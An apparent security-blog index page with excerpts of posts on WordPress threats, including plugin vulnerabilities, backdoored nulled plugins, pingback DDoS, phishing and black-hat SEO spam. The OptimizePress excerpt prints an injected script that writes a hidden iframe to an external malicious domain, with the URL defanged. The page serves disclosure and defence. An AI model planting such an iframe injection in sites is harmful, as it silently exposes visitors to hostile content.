Critical Update for JetPack WordPress Plugin

The Jetpack team just released a critical security update to fix a security vulnerability in the Jetpack WordPress plugin. The vulnerability allows an attacker to bypass the site’s access control and publish posts on the site. All versions of JetPack since October, 2012 (Jetpack 1.9) are vulnerable, and all users should update to version 2.9.3 ASAP.

Jetpack is a very popular plugin for WordPress with almost 10 million downloads, so the impact of such vulnerability can be very big if users do not update.

Read More

Unmasking “Free” Premium WordPress Plugins

WordPress has a large repository of free plugins (currently 30,000+) that can add almost any functionality to your blog. However, there is still a market for premium plugins. Premium plugins are especially popular when they help blogs make money: eCommerce, SEO, affiliate and customer management, and so on.

Such plugins may be really great and well worth their price, but not many webmasters are ready to pay for plugins, especially when they can find “free” or “nulled” versions of the same plugins on the Internet. All they need to do is search Google for [<plugin-name> free download].

Getting something valuable for free may sound great, however, in most cases, you won’t get what you expect. After all, you should ask yourself the question, why would someone spend their time to steal software, and then post it to various sites and forums where they can’t even count on any advertising revenue? Usually, the answer is that they expect to take advantage of the sites that install the software they post. How? By adding some undisclosed functionality to the stolen plugins like backdoors, ads, hidden links, and SPAM.

In this post, we’ll talk about “patched” malicious premium plugins. We’ll talk about what they do, how they work, and about websites that build their businesses around stolen WordPress themes and plugins.

Read More

More Than 162,000 WordPress Sites Used for Distributed Denial of Service Attack

Distributed Denial of Service (DDOS) attacks are becoming a common trend on our blog lately, and that’s OK because it’s a very serious issue for every website owner. Today I want to talk about a large DDOS attack that leveraged thousands of unsuspecting WordPress websites as indirect source amplification vectors.

Any WordPress site with Pingback enabled (which is on by default) can be used in DDOS attacks against other sites. Note that XMLRPC is used for pingbacks, trackbacks, remote access via mobile devices and many other features you’re likely very fond of. But, it can also be heavily misused like what we are seeing.

Read More

Recent OptimizePress Vulnerability Being Mass Infected

A few weeks ago we wrote about a file upload vulnerability in the OptmizePress theme. We were seeing a few sites being compromised by it, but nothing major.

That all changed yesterday when we detected roughly 2,000 websites compromised with iFrames that seemed to be caused by this same vulnerability. All of the contaminated websites that we have reviewed and cleared were using OptmizePress, and they all had the same iFrame injected in them:

<script> if(document.all ){ document.write ("<iframe 
 src=" httx:// gezidotojyk.org/ ohui.cgi?19" width="1" 
height="1"></iframe>"


Read More

WordPress OptimizePress Theme – File Upload Vulnerability

We’re a few days short on this, but it’s still worth releasing as the number of attacks against this vulnerability are increasing ten-fold.

The folks at OSIRT were the first to report this in late November, 2013. In our cases we’re seeing mostly defacement attacks, and although not devastating, they can be a big nuisance for an unsuspecting website owner.

Please be sure to read the official announcement by the OptimizePress team.

This is an important announcement for OptimizePress 1.0 users. (Please note this does NOT apply to OptimizePress 2.0 which is built with a completely new codebase)

Back in April 2013 we discovered a potential security flaw in part of the code for OptimizePress 1.0. Our developers quickly patched this issue and we released an update to the platform. We also announced this to our customers via email, although it appears now that many of our users may not have received this email. – OptimizePress Team (Read Full)

The Vulnerability

The target of the attack is the following file: lib/admin/media-upload.php. It can be used to upload any file to the wp-content/uploads/optpress/images_comingsoon directory. It doesn’t even change the extension.

Vulnerable versions of this file provide the upload functionality to anyone, while newer patched versions check for the admin permissions first. It is easy to tell one from the other.

The beginning of the vulnerable files:

Read More

Phishing Emails to Install Malicious WordPress Plugins

When all else fails, the bad guys can always rely on some basic social engineering tactics with a little hit of phishing!!

Over the weekend, a few of our clients received a very suspicious email telling them to download a new version of the popular “All in One SEO Pack” plugin for WordPress. What a win, right? It wasn’t just the plugin, but the Pro version too. To top it off, it was for Free!!! This is where the journey begins…

Happy Black Friday / Cyber Monday


Read More

Stealing Credit Cards – A WordPress and vBulletin Hack

What better way to celebrate Thanksgiving than to share an interesting case that involves two of the most popular CMS applications out there – vBulletin and WordPress.

Here is a real case that we just worked on this week, involving an attacker dead set on stealing credit card information. Enjoy!

The Environment

The client runs a fairly successful e-commerce website. They run two main applications within their architecture – vBulletin and WordPress.

vBulletin is used for their support and collaboration forums, while WordPress for their main website and e-commerce. This appears to be a pretty standard configuration across most larger web application environments these days.

Everything is sitting on a LAMP (Linux / Apache / MySQL / PHP) stack, so nothing too special there. For the most part, things are up to date, they might be a version or two behind, but none of it earth shattering or something worth writing home about.

In regards to security, they are running CloudFlare.

All in all, it probably sounds a lot like your environment[s].

Read More

Another Fake WordPress Plugin – And Yet Another SPAM Infection!

We clean hundreds and thousands of infected websites, a lot of the cleanups can be considered to be somewhat “routine”. If you follow our blog, you often hear us say we’ve seen “this” numerous times, we’ve cleaned “that” numerous times.

In most cases when dealing with infected websites, we know where to look and what to remove, generally with a quick look we can determine what’s going. Despite our experience and passion for cleaning up a hacked website, there are always surprises lurking and waiting for us, almost every day.

Some of the most interesting routine cases we deal with are often websites with SPAM. SPAM is in the database, or the whole block of SPAM code is stored in some obscure file. We also deal with cases where the SPAM is loaded within the theme or template header, footer, index, etc. Sometimes these SPAM infections are conditional (e.g. They only appear once per IP), sometimes not.

More often than not however, these infections is not too difficult to identify and remove. In the case we’re writing about in this post, we were able not only to remove malware, but also take a look at what’s going on behind the curtain.

Read More

The Story of Clip:rect – A Black Hat SEO Trick

We regularly write about Black Hat SEO hacks here. Such hacks help hackers monetize their access to compromised sites by incorporating them into massive schemes that try to manipulate search engine results for queries that potential clients may be interested in. Think of gray areas like: payday loans, pharmaceuticals, counterfeit drugs and luxury goods.

As you know, search ranking is all about the number and quality of inbound links to your site. To promote a web page, spammers need to place a link to them on as many sites as possible. This is why injecting spammy links into hacked sites is an important step for most Black Hat SEO schemes.

You can’t simply add links to someone else’s pages and expect that the site owner will tolerate it, so hackers make such links invisible to normal site visitors and visible to search engine bots.

There are many tricks they can be used to hide links. It can be a sophisticated server-side cloaking (detecting search bots by IP/UA and injecting the SPAM on the fly), or a simple HTML trick like setting styles to display:none. In this post, we’ll talk about something in the middle, a trick that involves deceptive JavaScript and creative use of CSS.


Read More

Case Study: Analyzing a WordPress Attack – Dissecting the webr00t cgi shell – Part I

November 1st started like any other day on the web. Billions of requests were being shot virtually between servers in safe and not so safe attempts to access information. After months of waiting, finally one of those not so safe request hit one of our honeypots.

We won’t get into the location of the site because it really doesn’t matter, a fact that most critics don’t realize. As is often the case, the honeypot site was quiet without much traffic and the weakness was access control.

We intentionally left the password to the site to one of the top 10 passwords, with continuous attempts it took about 3 months before it was accessed.

This time though we were ready and this is how it went..

Read More